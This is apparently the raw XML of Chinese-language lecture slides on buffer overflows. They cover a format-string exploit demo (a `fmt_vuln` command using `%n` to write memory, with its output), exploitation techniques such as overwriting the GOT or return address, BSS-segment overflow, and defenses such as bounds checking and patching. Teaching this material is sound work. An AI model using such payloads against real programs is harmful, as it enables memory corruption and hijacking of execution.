                <a:spcPts val="0"/>
              </a:spcBef>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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="294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4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4915">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="294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4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4915">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="294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4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4915">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="294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4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4915">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="294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49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49569836-90D9-4712-AFDF-99CFF9E6BC27}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$./fmt_vuln `printf “\x70\x95\x04\x08”`%x.%x.%100x%n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>The right way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>%x.%x.%100x%n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>The wrong way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Bffff5a0.3e8.                     			      							3e8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Testval @0x08049570 =117 0x00000075</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="808460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lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunc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fld id="{9F7A0CF5-649A-4C68-A952-C280D75DE768}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>漏洞利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90116" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目前比较常用的利用方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>覆盖函数返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.dtors list</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>GOT </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>4)Return into libc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="574709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8638" y="2714625"/>
            <a:ext cx="4706937" cy="1035050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>段溢出</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dirty="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597852" y="1293178"/>
            <a:ext cx="7951787" cy="4985702"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>段存放全局和静态的未初始化变量，变量与变量之间是连续存放的，没有保留空间。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这样定义的两个字符数组即是位于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>段：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>         static char buf1[16]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>buf2[16]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>如果事先向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>buf2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>中写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>个字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>，之后再往</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>buf1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>中写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>，由于变量之间是连续存放的，静态字符数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>buf1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>溢出后，就会覆盖其相邻区域字符数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>buf2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>的值。利用这一点，攻击者可以通过改写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>中的指针或函数指针等方式，改变程序原先的执行流程，使指针跳转到特定的内存地址并执行指定操作。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ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内容提要</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800"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64523" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2633663"/>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24" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2717800" y="1976438"/>
            <a:ext cx="4591050" cy="579437"/>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latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64525"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="3319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64526" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2451100" y="3929063"/>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27" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2771775" y="3271838"/>
            <a:ext cx="4464050" cy="579437"/>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latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64528" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2025650" y="3417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64543"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en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 36"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1841500" y="4758690"/>
            <a:ext cx="762000" cy="665163"/>
            <a:chOff x="1110" y="2656"/>
            <a:chExt cx="1549" cy="1351"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64549" name="AutoShape 37"/>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50" name="AutoShape 3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51" name="AutoShape 39"/>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64552" name="Line 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2451100" y="5368290"/>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53" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2713039" y="4711065"/>
            <a:ext cx="4708842" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6600"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击防御措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64554" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2038350" y="485711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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2540887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zh-CN" altLang="en-US" sz="3600"/>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687388" y="1296987"/>
            <a:ext cx="7772400" cy="4770437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统管理上的防御策略</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关闭不需要的特权程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>及时给程序漏洞打补丁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序开发中的防御策略</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编写正确的代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>非执行的缓冲区</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数组边界检查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序指针完整性检查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其它方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>……</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a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>、关闭不需要的特权程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
